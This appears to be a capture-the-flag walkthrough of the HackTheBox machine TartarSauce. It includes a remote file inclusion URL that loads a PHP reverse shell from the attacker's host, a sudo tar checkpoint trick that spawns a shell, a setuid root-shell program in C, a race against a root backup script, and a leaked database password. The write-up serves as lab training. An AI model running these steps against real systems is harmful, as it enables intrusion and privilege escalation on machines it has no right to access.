6 minutes
TarTarSauce
Enumeration
Nmap reveals only 1 port open
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-24 05:47 EDT
Nmap scan report for 10.10.10.88
Host is up (0.046s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Begin with poking at /webservices/monstra-3.0.4/
.
Searchsploit shows that there is an authenticated RCE.
This blog post mentions that password hashes are exposed via http://sitename.com/storage/database/users.table.xml
.
However the passwords are salted, but many configurations are configured with the standard salt value
/**
* Set password salt
*/
define('MONSTRA_PASSWORD_SALT', 'YOUR_SALT_HERE');
Tried to crack the password with hashcat and the standard salt. However, this was a dead end.
Running gobuster against /webservices/
reveals that there is a Wordpress site at wp
which points to tartarsauce.htb
.
Wpscan reveals that the site is using the plugin Gwolle
.
Searchsploit shows there is a LFI vuln in the plugin
To get our foothold shell we host a php shell locally and access
10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.65:8000/
.
listening on [any] 1234 ...
connect to [10.10.16.65] from (UNKNOWN) [10.10.10.88] 54070
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
06:54:26 up 1:08, 0 users, load average: 0.01, 0.05, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
User
Linpeas reveals the DB creds
define('DB_NAME', 'wp');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');
define('DB_HOST', 'localhost');
The creds gives us access to the SQL DB.
$ mysql -u wpuser -p
w0rdpr3$$d@t@b@$3@cc3$$
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 92
Server version: 5.7.22-0ubuntu0.16.04.1 (Ubuntu) > show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wp |
+--------------------+
2 rows in set (0.00 sec)
show tables;
+-----------------------+
| Tables_in_wp |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_gwolle_gb_entries |
| wp_gwolle_gb_log |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
14 rows in set (0.00 sec)
select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | wpadmin | $P$BBU0yjydBz9THONExe2kPEsvtjStGe1 | wpadmin | wpadmin@test.local | | 2018-02-09 20:49:26 | | 0 | wpadmin |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)
Attempting to crack it with hashcat appears to be a deadend.
www-data can tar files as the user onuma:
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/tmp$
GTFObins shows that we can spawn an interactive shell.
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
< /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
/bin/tar: Removing leading `/' from member names
whoami
onuma
$
Root
From the lineas enumeration, we know that there is a backup script running based upon the output of onuma_backup_test.txt
.
By running find / -type f -name "backuperer" 2>/dev/null
we find that it is located in /usr/sbin/backuperer
.
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
Going through the script can understand that :
- Sets local vars
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
- Runs every 5 minutes (checking service details)
- Deletes
$tempdir
(/var/tmp) and$check
(/var/tmp/check) - compresses
$tmpfile
into$basedir
tar -zcvf $tmpfile $basedir &
- Runs integrity check
diff -r $basedir $check$basedir
(/var/www/html vs /var/tmp/check/var/www/html) - makes
$check
directory (/var/tmp/check). - Extracts the contents of
$tmpfile
to$check
and integrity checks
Inspecting the integrity checks
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
[...]
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
We see that it runs diff -r
recursively compare any subdirectories found.
If the integrity check fails, it deletes files. If successful then it prints error message to the log.
We want it to fail.
We need to create an archive which has /var/www/html
then the diff command is valid (meaning that the diff returns 1
(true)).
Make $basedir
mkdir -p /var/tmp/html
Make check$basedir
mkdir -p var/www/html
We want to create a SETUID file, because tar keeps the file permissions.
We can compile our own from our box
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void main()
{
setreuid(0,0);
execve("/bin/sh", NULL,NULL);
}
Since the arch on that victim is 32 bit, we compile it to match.
gcc setuid.c -m32 -o setuid
Then we make the owner to root
sudo chown root setuid
sudo chmod 6555 setuid
We wait for the script to create the tar archive (each 5 min)
We can monitor this by running systemctl list-timers
Once the archive has been created, we have 30 seconds to copy our archive to replace the one created by the script, since root will extract the archive.
Then the check dir will be created.
cd check
cd var
cd www
cd html
./setuid
cd /root
ls
root.txt sys.sql wp.sql